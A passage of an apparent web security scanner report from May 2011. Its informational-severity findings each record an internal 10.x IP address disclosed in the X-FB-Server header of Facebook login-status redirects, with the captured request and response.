Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f31ca45bc8&origin=http%3A%2F%2Faol.sportingnews.com%2Ff24f745ae8&relation=parent&transport=postmessage&frame=f201cd97c
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.180.31
X-Cnection: close
Date: Thu, 05 May 2011 01:54:16 GMT
Content-Length: 0

20.115. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.115.71

Request

GET /extern/login_status.php?api_key=4d965afccc4d86c598dbf5d94fb34a7c&app_id=4d965afccc4d86c598dbf5d94fb34a7c&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df4874ef4c%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff3196709bc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df9e05244%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff3196709bc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ada2e1a8%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1f62df18%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff3196709bc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ada2e1a8&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfcb3bcf2c%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff3196709bc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ada2e1a8&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3f5433e6%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff3196709bc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3ada2e1a8&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=fcb3bcf2c&origin=http%3A%2F%2Fwww.huffingtonpost.com%2Ff3196709bc&relation=parent&transport=postmessage&frame=f3ada2e1a8
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.115.71
X-Cnection: close
Date: Thu, 05 May 2011 00:59:03 GMT
Content-Length: 0

20.116. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.80.35

Request

GET /extern/login_status.php?api_key=4d965afccc4d86c598dbf5d94fb34a7c&app_id=4d965afccc4d86c598dbf5d94fb34a7c&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfbf0092d%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff28e24ca18%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3f32c7344%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff28e24ca18%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df29d19d71%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df15fd82568%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff28e24ca18%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df29d19d71&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3490a87c%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff28e24ca18%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df29d19d71&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df23ac3ba2c%26origin%3Dhttp%253A%252F%252Fwww.huffingtonpost.com%252Ff28e24ca18%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df29d19d71&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f3490a87c&origin=http%3A%2F%2Fwww.huffingtonpost.com%2Ff28e24ca18&relation=parent&transport=postmessage&frame=f29d19d71
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.80.35
X-Cnection: close
Date: Thu, 05 May 2011 00:59:36 GMT
Content-Length: 0

20.117. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.36.25.125

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3e08a8c5%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff136968914%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df290dbda34%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff136968914%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3d14f1048%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df475dd84%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff136968914%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3d14f1048&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df32c098aec%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff136968914%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3d14f1048&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1b7899b18%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff136968914%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3d14f1048&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f32c098aec&origin=http%3A%2F%2Faol.sportingnews.com%2Ff136968914&relation=parent&transport=postmessage&frame=f3d14f1048
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.25.125
X-Cnection: close
Date: Thu, 05 May 2011 01:13:48 GMT
Content-Length: 0

20.118. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.73.85

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dff58e26bc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff23834d3b4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3db059118%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff23834d3b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df34bac2b9%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfa11ac98%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff23834d3b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df34bac2b9&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2fc7c99bc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff23834d3b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df34bac2b9&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df35489dbbc%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff23834d3b4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df34bac2b9&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f2fc7c99bc&origin=http%3A%2F%2Faol.sportingnews.com%2Ff23834d3b4&relation=parent&transport=postmessage&frame=f34bac2b9
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.73.85
X-Cnection: close
Date: Thu, 05 May 2011 01:02:41 GMT
Content-Length: 0

20.119. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.91.59

Request

GET /extern/login_status.php?api_key=187288694643718&app_id=187288694643718&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df876a0bb4%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff323064cd%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfd7b34e7c%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff323064cd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df16369a394%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df20aa5ab4%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff323064cd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df16369a394&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df365c1183c%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff323064cd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df16369a394&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1e29349dc%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff323064cd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df16369a394&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f365c1183c&origin=http%3A%2F%2Ftechcrunch.com%2Ff323064cd&relation=parent&transport=postmessage&frame=f16369a394
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.91.59
X-Cnection: close
Date: Thu, 05 May 2011 01:39:50 GMT
Content-Length: 0

20.120. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.76.122

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfc6026e1c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff42873058%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Dfc235f98%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff42873058%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d0c9bff4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df478f4b1%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff42873058%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d0c9bff4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1af055df4%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff42873058%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d0c9bff4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df331003084%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff42873058%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2d0c9bff4&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f1af055df4&origin=http%3A%2F%2Faol.sportingnews.com%2Ff42873058&relation=parent&transport=postmessage&frame=f2d0c9bff4
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.76.122
X-Cnection: close
Date: Thu, 05 May 2011 02:09:43 GMT
Content-Length: 0

20.121. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.20.55

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1a114a08%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff120b5f6%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df74430bc8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff120b5f6%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff49b5578%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1dc849b3%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff120b5f6%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff49b5578&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df23c1e0b28%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff120b5f6%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff49b5578&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df3744a7d6c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff120b5f6%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff49b5578&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f23c1e0b28&origin=http%3A%2F%2Faol.sportingnews.com%2Ff120b5f6&relation=parent&transport=postmessage&frame=ff49b5578
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.20.55
X-Cnection: close
Date: Thu, 05 May 2011 01:41:57 GMT
Content-Length: 0

20.122. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.52.81.59

Request

GET /extern/login_status.php?api_key=113402378708388&app_id=113402378708388&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df714303%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff323064cd%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df36d8d2034%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff323064cd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfdef7eff4%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df24c1f259%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff323064cd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfdef7eff4&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df175414498%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff323064cd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfdef7eff4&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df263020634%26origin%3Dhttp%253A%252F%252Ftechcrunch.com%252Ff323064cd%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfdef7eff4&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/?icid=navbar_techcrunch_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f175414498&origin=http%3A%2F%2Ftechcrunch.com%2Ff323064cd&relation=parent&transport=postmessage&frame=fdef7eff4
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.81.59
X-Cnection: close
Date: Thu, 05 May 2011 01:39:59 GMT
Content-Length: 0

20.123. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.36.47.123

Request

GET /extern/login_status.php?api_key=117854138246106&app_id=117854138246106&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1a9267c6%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff80eb579c%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&method=auth.status&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df2d787a514%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff80eb579c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df6a353014%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1180db224%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff80eb579c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df6a353014&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1d8d4d06c%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff80eb579c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df6a353014&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D0%23cb%3Df1cced65f8%26origin%3Dhttp%253A%252F%252Faol.sportingnews.com%252Ff80eb579c%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df6a353014&sdk=joey&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://aol.sportingnews.com/iframe-widgets/feed/accordion.php?body-class=homepage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://static.ak.fbcdn.net/connect/xd_proxy.php?version=0#cb=f1d8d4d06c&origin=http%3A%2F%2Faol.sportingnews.com%2Ff80eb579c&relation=parent&transport=postmessage&frame=f6a353014
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.47.123
X-Cnection: close
Date: Thu, 05 May 2011 01:15:12 GMT
Content-Length: 0

20.124. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.150.53

Request

